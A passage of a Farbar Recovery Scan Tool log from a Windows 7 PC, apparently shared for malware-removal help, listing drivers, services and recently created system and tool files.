R3 RasPppoe; C:\Windows\System32\DRIVERS\raspppoe.sys [92672 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 RasSstp; C:\Windows\System32\DRIVERS\rassstp.sys [83968 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R1 rdbss; C:\Windows\System32\DRIVERS\rdbss.sys [317440 2017-10-11] (Microsoft Windows -> Microsoft Corporation)
S3 rdpbus; C:\Windows\system32\drivers\rdpbus.sys [24064 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R1 RDPCDD; C:\Windows\System32\DRIVERS\RDPCDD.sys [7680 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R1 RDPENCDD; C:\Windows\System32\drivers\rdpencdd.sys [7680 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R1 RDPREFMP; C:\Windows\System32\drivers\rdprefmp.sys [8192 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 RDPWD; C:\Windows\System32\Drivers\RDPWD.sys [212480 2014-07-16] (Microsoft Windows -> Microsoft Corporation)
R0 rdyboost; C:\Windows\System32\drivers\rdyboost.sys [213736 2017-12-31] (Microsoft Windows -> Microsoft Corporation)
S3 Revoflt; C:\Windows\System32\DRIVERS\revoflt.sys [31800 2009-12-30] (VS Revo Group -> VS Revo Group)
R2 rspndr; C:\Windows\System32\DRIVERS\rspndr.sys [76800 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 RTL8167; C:\Windows\System32\DRIVERS\Rt64win7.sys [187392 2009-06-10] (Microsoft Windows -> Realtek Corporation )
S3 sbp2port; C:\Windows\system32\drivers\sbp2port.sys [103808 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 scfilter; C:\Windows\System32\DRIVERS\scfilter.sys [29696 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S4 secdrv; C:\Windows\System32\Drivers\secdrv.sys [23040 2009-06-10] (Microsoft Windows -> Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.)
S3 Serenum; C:\Windows\system32\drivers\serenum.sys [23552 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 Serial; C:\Windows\system32\drivers\serial.sys [94208 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 sermouse; C:\Windows\system32\drivers\sermouse.sys [26624 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 sffdisk; C:\Windows\system32\drivers\sffdisk.sys [14336 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 sffp_mmc; C:\Windows\system32\drivers\sffp_mmc.sys [13824 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 sffp_sd; C:\Windows\system32\drivers\sffp_sd.sys [14336 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 sfloppy; C:\Windows\system32\drivers\sfloppy.sys [16896 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 SiSRaid2; C:\Windows\system32\drivers\SiSRaid2.sys [43584 2009-07-13] (Microsoft Windows -> Silicon Integrated Systems Corp.)
S3 SiSRaid4; C:\Windows\system32\drivers\sisraid4.sys [80464 2009-07-13] (Microsoft Windows -> Silicon Integrated Systems)
S3 Smb; C:\Windows\System32\DRIVERS\smb.sys [93184 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R0 spldr; C:\Windows\System32\Drivers\spldr.sys [19008 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 srv; C:\Windows\System32\DRIVERS\srv.sys [464384 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
R3 srv2; C:\Windows\System32\DRIVERS\srv2.sys [406016 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
R3 srvnet; C:\Windows\System32\DRIVERS\srvnet.sys [169472 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 stexstor; C:\Windows\system32\drivers\stexstor.sys [24656 2009-07-13] (Microsoft Windows -> Promise Technology)
R3 swenum; C:\Windows\system32\drivers\swenum.sys [12136 2019-04-18] (Microsoft Windows -> Microsoft Corporation)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [36168 2019-04-25] (McAfee, Inc. -> The OpenVPN Project)
R0 Tcpip; C:\Windows\System32\drivers\tcpip.sys [1893096 2019-04-24] (Microsoft Windows -> Microsoft Corporation)
S3 TCPIP6; C:\Windows\System32\DRIVERS\tcpip.sys [1893096 2019-04-24] (Microsoft Windows -> Microsoft Corporation)
R2 tcpipreg; C:\Windows\System32\drivers\tcpipreg.sys [46080 2016-07-07] (Microsoft Windows -> Microsoft Corporation)
S3 TDPIPE; C:\Windows\System32\drivers\tdpipe.sys [15872 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 TDTCP; C:\Windows\System32\drivers\tdtcp.sys [23552 2012-02-16] (Microsoft Windows -> Microsoft Corporation)
R1 tdx; C:\Windows\System32\DRIVERS\tdx.sys [117248 2017-07-29] (Microsoft Windows -> Microsoft Corporation)
R1 TermDD; C:\Windows\system32\drivers\termdd.sys [63208 2019-04-18] (Microsoft Windows -> Microsoft Corporation)
S3 tssecsrv; C:\Windows\System32\DRIVERS\tssecsrv.sys [40448 2017-08-13] (Microsoft Windows -> Microsoft Corporation)
S3 TsUsbFlt; C:\Windows\System32\drivers\tsusbflt.sys [59392 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 TsUsbGD; C:\Windows\system32\drivers\TsUsbGD.sys [31232 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
R3 tunnel; C:\Windows\System32\DRIVERS\tunnel.sys [125440 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 t_mouse.sys; C:\Windows\System32\DRIVERS\t_mouse.sys [6144 2012-12-19] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 uagp35; C:\Windows\system32\drivers\uagp35.sys [64080 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R4 udfs; C:\Windows\System32\DRIVERS\udfs.sys [328192 2019-02-10] (Microsoft Windows -> Microsoft Corporation)
S3 uliagpkx; C:\Windows\system32\drivers\uliagpkx.sys [64232 2019-04-18] (Microsoft Windows -> Microsoft Corporation)
R3 umbus; C:\Windows\System32\DRIVERS\umbus.sys [48640 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 UmPass; C:\Windows\system32\drivers\umpass.sys [9728 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 usbccgp; C:\Windows\system32\drivers\usbccgp.sys [99840 2018-05-02] (Microsoft Windows -> Microsoft Corporation)
S3 usbcir; C:\Windows\system32\drivers\usbcir.sys [100864 2013-07-12] (Microsoft Windows -> Microsoft Corporation)
R3 usbehci; C:\Windows\system32\drivers\usbehci.sys [56320 2018-05-02] (Microsoft Windows -> Microsoft Corporation)
R3 usbhub; C:\Windows\system32\drivers\usbhub.sys [344064 2018-05-02] (Microsoft Windows -> Microsoft Corporation)
S3 usbohci; C:\Windows\system32\drivers\usbohci.sys [25600 2018-05-02] (Microsoft Windows -> Microsoft Corporation)
S3 usbprint; C:\Windows\System32\DRIVERS\usbprint.sys [25088 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 usbscan; C:\Windows\system32\drivers\usbscan.sys [42496 2013-07-02] (Microsoft Windows -> Microsoft Corporation)
S3 USBSTOR; C:\Windows\System32\DRIVERS\USBSTOR.SYS [91648 2016-02-03] (Microsoft Windows -> Microsoft Corporation)
S3 usbuhci; C:\Windows\system32\drivers\usbuhci.sys [30720 2018-05-02] (Microsoft Windows -> Microsoft Corporation)
R0 vdrvroot; C:\Windows\System32\drivers\vdrvroot.sys [36064 2019-04-18] (Microsoft Windows -> Microsoft Corporation)
S3 vga; C:\Windows\System32\DRIVERS\vgapnp.sys [29184 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R1 VgaSave; C:\Windows\System32\drivers\vga.sys [29184 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 vhdmp; C:\Windows\system32\drivers\vhdmp.sys [215936 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 viaide; C:\Windows\system32\drivers\viaide.sys [17488 2009-07-13] (Microsoft Windows -> VIA Technologies, Inc.)
R0 volmgr; C:\Windows\System32\drivers\volmgr.sys [68328 2019-04-18] (Microsoft Windows -> Microsoft Corporation)
R0 volmgrx; C:\Windows\System32\drivers\volmgrx.sys [363752 2017-07-07] (Microsoft Windows -> Microsoft Corporation)
R0 volsnap; C:\Windows\System32\drivers\volsnap.sys [296320 2011-02-25] (Microsoft Windows -> Microsoft Corporation)
S3 vsmraid; C:\Windows\system32\drivers\vsmraid.sys [161872 2009-07-13] (Microsoft Windows -> VIA Technologies Inc.,Ltd)
R3 vwifibus; C:\Windows\System32\DRIVERS\vwifibus.sys [24576 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R1 vwififlt; C:\Windows\System32\DRIVERS\vwififlt.sys [59904 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 vwifimp; C:\Windows\System32\DRIVERS\vwifimp.sys [17920 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 WacomPen; C:\Windows\system32\drivers\wacompen.sys [27776 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 WANARP; C:\Windows\System32\DRIVERS\wanarp.sys [88576 2018-12-07] (Microsoft Windows -> Microsoft Corporation)
R1 Wanarpv6; C:\Windows\System32\DRIVERS\wanarp.sys [88576 2018-12-07] (Microsoft Windows -> Microsoft Corporation)
S3 Wd; C:\Windows\system32\drivers\wd.sys [21056 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R0 Wdf01000; C:\Windows\System32\drivers\Wdf01000.sys [785624 2013-06-25] (Microsoft Windows -> Microsoft Corporation)
R1 WfpLwf; C:\Windows\System32\DRIVERS\wfplwf.sys [12800 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 WIMMount; C:\Windows\System32\drivers\wimmount.sys [22096 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 WIMMount; C:\Windows\SysWOW64\drivers\wimmount.sys [19008 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
U3 Winsock; no ImagePath
S3 WinUsb; C:\Windows\System32\DRIVERS\WinUsb.sys [41984 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
R3 WmiAcpi; C:\Windows\system32\drivers\wmiacpi.sys [14336 2018-02-10] (Microsoft Windows -> Microsoft Corporation)
R0 WRkrn; C:\Windows\System32\drivers\WRkrn.sys [144784 2018-08-01] (Webroot Inc. -> Webroot)
S3 wrUrlFlt; C:\Windows\system32\DRIVERS\wrUrlFlt.sys [66328 2016-09-29] (Webroot Inc. -> Webroot)
S4 ws2ifsl; C:\Windows\system32\drivers\ws2ifsl.sys [21504 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 WudfPf; C:\Windows\System32\drivers\WudfPf.sys [87040 2012-07-25] (Microsoft Windows -> Microsoft Corporation)
S3 WUDFRd; C:\Windows\System32\DRIVERS\WUDFRd.sys [198656 2012-07-25] (Microsoft Windows -> Microsoft Corporation)
S3 yukonw7; C:\Windows\System32\DRIVERS\yk62x64.sys [389120 2009-06-10] (Microsoft Windows -> Marvell)
U0 SR; no ImagePath
U2 srservice; no ImagePath
U3 aswMBR; \??\C:\Users\richard\AppData\Local\Temp\aswMBR.sys [X] <==== ATTENTION
U3 aswVmm; \??\C:\Users\richard\AppData\Local\Temp\aswVmm.sys [X] <==== ATTENTION
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-07-17 09:22 - 2019-07-17 09:22 - 000000373 _____ C:\Users\richard\Desktop\Addition.txt
2019-07-17 09:21 - 2019-07-17 09:25 - 000062866 _____ C:\Users\richard\Desktop\FRST.txt
2019-07-17 09:19 - 2019-07-17 09:22 - 000000000 ____D C:\FRST
2019-07-17 09:19 - 2019-07-17 09:19 - 002095104 _____ (Farbar) C:\Users\richard\Downloads\FRST64.exe
2019-07-17 09:19 - 2019-07-17 09:19 - 002095104 _____ (Farbar) C:\Users\richard\Desktop\FRST64.exe
2019-07-17 09:17 - 2019-07-17 09:17 - 001446912 _____ (Farbar) C:\Users\richard\Downloads\FRST (1).exe
2019-07-17 09:13 - 2019-07-17 09:12 - 001446912 _____ (Farbar) C:\Users\richard\Desktop\FRST.exe
2019-07-17 09:12 - 2019-07-17 09:12 - 001446912 _____ (Farbar) C:\Users\richard\Downloads\FRST.exe
2019-07-17 09:11 - 2019-07-17 08:59 - 005198336 _____ (AVAST Software) C:\Users\richard\Desktop\aswMBR (1).exe
2019-07-17 09:09 - 2019-07-17 09:09 - 000000983 _____ C:\Users\richard\Desktop\aswMBR.txt
2019-07-17 09:05 - 2019-07-17 09:05 - 000000000 ____D C:\Users\richard\Desktop\whatthetech stuff
2019-07-17 08:59 - 2019-07-17 08:59 - 005198336 _____ (AVAST Software) C:\Users\richard\Downloads\aswMBR (1).exe
2019-07-17 08:37 - 2019-07-17 08:37 - 000185902 _____ C:\Users\richard\Documents\cc_20190717_083742.reg
2019-07-14 20:20 - 2019-07-14 20:20 - 001207336 _____ (Adobe Inc) C:\Users\richard\Downloads\flashplayer32au_ga_install.exe
2019-07-11 20:44 - 2019-07-14 20:04 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2019-07-09 19:06 - 2019-06-28 00:24 - 000887808 _____ (Microsoft Corporation) C:\Windows\system32\wlansvc.dll
2019-07-09 19:06 - 2019-06-28 00:24 - 000448512 _____ (Microsoft Corporation) C:\Windows\system32\wlansec.dll
2019-07-09 19:06 - 2019-06-28 00:24 - 000414208 _____ (Microsoft Corporation) C:\Windows\system32\wlanmsm.dll
2019-07-09 19:06 - 2019-06-28 00:24 - 000118784 _____ (Microsoft Corporation) C:\Windows\system32\wlanhlp.dll
2019-07-09 19:06 - 2019-06-28 00:24 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\wlanapi.dll
2019-07-09 19:06 - 2019-06-28 00:23 - 000428032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanmsm.dll
2019-07-09 19:06 - 2019-06-28 00:23 - 000392704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlansec.dll
2019-07-09 19:06 - 2019-06-28 00:23 - 000083968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanhlp.dll
2019-07-09 19:06 - 2019-06-28 00:23 - 000080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanapi.dll
2019-07-09 19:06 - 2019-06-20 22:09 - 000806400 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2019-07-09 19:06 - 2019-06-20 22:05 - 000628224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2019-07-09 19:06 - 2019-06-20 21:44 - 003229696 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2019-07-09 19:06 - 2019-06-20 20:41 - 001251840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2019-07-09 19:06 - 2019-06-20 04:11 - 000396896 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2019-07-09 19:06 - 2019-06-20 03:15 - 000348976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2019-07-09 19:06 - 2019-06-18 01:41 - 001649664 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2019-07-09 19:06 - 2019-06-17 23:34 - 025730560 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2019-07-09 19:06 - 2019-06-17 23:21 - 002724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2019-07-09 19:06 - 2019-06-17 23:21 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2019-07-09 19:06 - 2019-06-17 23:09 - 002903552 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2019-07-09 19:06 - 2019-06-17 23:08 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2019-07-09 19:06 - 2019-06-17 23:07 - 000578560 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2019-07-09 19:06 - 2019-06-17 23:07 - 000417280 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2019-07-09 19:06 - 2019-06-17 23:07 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2019-07-09 19:06 - 2019-06-17 23:07 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2019-07-09 19:06 - 2019-06-17 23:00 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2019-07-09 19:06 - 2019-06-17 22:59 - 005775872 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2019-07-09 19:06 - 2019-06-17 22:59 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2019-07-09 19:06 - 2019-06-17 22:57 - 000615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2019-07-09 19:06 - 2019-06-17 22:56 - 020274688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2019-07-09 19:06 - 2019-06-17 22:56 - 000790528 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2019-07-09 19:06 - 2019-06-17 22:56 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2019-07-09 19:06 - 2019-06-17 22:56 - 000116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2019-07-09 19:06 - 2019-06-17 22:55 - 000814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2019-07-09 19:06 - 2019-06-17 22:51 - 002724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2019-07-09 19:06 - 2019-06-17 22:48 - 000969216 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2019-07-09 19:06 - 2019-06-17 22:45 - 000489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2019-07-09 19:06 - 2019-06-17 22:39 - 000496128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2019-07-09 19:06 - 2019-06-17 22:39 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2019-07-09 19:06 - 2019-06-17 22:39 - 000062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2019-07-09 19:06 - 2019-06-17 22:38 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2019-07-09 19:06 - 2019-06-17 22:38 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2019-07-09 19:06 - 2019-06-17 22:38 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2019-07-09 19:06 - 2019-06-17 22:38 - 000047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2019-07-09 19:06 - 2019-06-17 22:37 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2019-07-09 19:06 - 2019-06-17 22:35 - 002297344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2019-07-09 19:06 - 2019-06-17 22:35 - 000199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2019-07-09 19:06 - 2019-06-17 22:34 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2019-07-09 19:06 - 2019-06-17 22:32 - 000315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2019-07-09 19:06 - 2019-06-17 22:32 - 000047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2019-07-09 19:06 - 2019-06-17 22:32 - 000030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2019-07-09 19:06 - 2019-06-17 22:30 - 000476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2019-07-09 19:06 - 2019-06-17 22:30 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2019-07-09 19:06 - 2019-06-17 22:29 - 000663040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2019-07-09 19:06 - 2019-06-17 22:29 - 000620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2019-07-09 19:06 - 2019-06-17 22:29 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2019-07-09 19:06 - 2019-06-17 22:21 - 000416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2019-07-09 19:06 - 2019-06-17 22:21 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2019-07-09 19:06 - 2019-06-17 22:20 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2019-07-09 19:06 - 2019-06-17 22:20 - 000728064 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2019-07-09 19:06 - 2019-06-17 22:19 - 015311872 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2019-07-09 19:06 - 2019-06-17 22:17 - 002136064 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2019-07-09 19:06 - 2019-06-17 22:17 - 001359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2019-07-09 19:06 - 2019-06-17 22:16 - 000091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2019-07-09 19:06 - 2019-06-17 22:16 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2019-07-09 19:06 - 2019-06-17 22:16 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2019-07-09 19:06 - 2019-06-17 22:13 - 000168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2019-07-09 19:06 - 2019-06-17 22:13 - 000076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2019-07-09 19:06 - 2019-06-17 22:11 - 000279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2019-07-09 19:06 - 2019-06-17 22:10 - 000130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2019-07-09 19:06 - 2019-06-17 22:07 - 004494336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2019-07-09 19:06 - 2019-06-17 22:06 - 004858880 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2019-07-09 19:06 - 2019-06-17 22:04 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2019-07-09 19:06 - 2019-06-17 22:03 - 013706752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2019-07-09 19:06 - 2019-06-17 22:03 - 002060288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2019-07-09 19:06 - 2019-06-17 22:03 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2019-07-09 19:06 - 2019-06-17 22:02 - 001155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2019-07-09 19:06 - 2019-06-17 21:55 - 001557504 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2019-07-09 19:06 - 2019-06-17 21:44 - 004386304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2019-07-09 19:06 - 2019-06-17 21:43 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2019-07-09 19:06 - 2019-06-17 21:41 - 001323008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2019-07-09 19:06 - 2019-06-17 21:39 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2019-07-09 19:06 - 2019-06-12 22:25 - 000160488 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2019-07-09 19:06 - 2019-06-12 22:21 - 000732160 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2019-07-09 19:06 - 2019-06-12 10:23 - 004057320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2019-07-09 19:06 - 2019-06-12 10:23 - 003964136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2019-07-09 19:06 - 2019-06-12 10:22 - 001314104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 012574208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2019-07-09 19:06 - 2019-06-12 10:21 - 011411968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000275968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 003207168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 001329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000555520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000442368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000261632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000046592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssign32.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 001177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 001005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
